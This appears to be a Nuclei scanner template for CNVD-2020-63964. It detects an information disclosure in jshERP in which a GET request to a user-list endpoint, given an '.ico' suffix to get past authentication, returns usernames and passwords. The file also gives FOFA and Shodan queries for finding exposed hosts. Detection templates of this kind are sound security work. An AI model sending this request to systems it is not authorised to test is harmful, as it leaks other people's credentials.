nuclei-templates/http/cnvd/2020/CNVD-2020-63964.yaml

39 lines
836 B
YAML

id: CNVD-2020-63964
info:
name: jshERP - Information Disclosure
author: brucelsone
severity: high
description: |
jshERP that can reveal sensitive information including system credentials without credentials.
reference:
- https://cn-sec.com/archives/1798444.html
metadata:
max-request: 1
fofa-query: jshERP-boot
shodan-query: http.favicon.hash:-1298131932
tags: cnvd,cnvd2022,jsherp,disclosure
http:
- method: GET
path:
- "{{BaseURL}}/jshERP-boot/user/getAllList;.ico"
matchers-condition: and
matchers:
- type: word
words:
- '"username":'
- '"loginName":'
- '"password":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200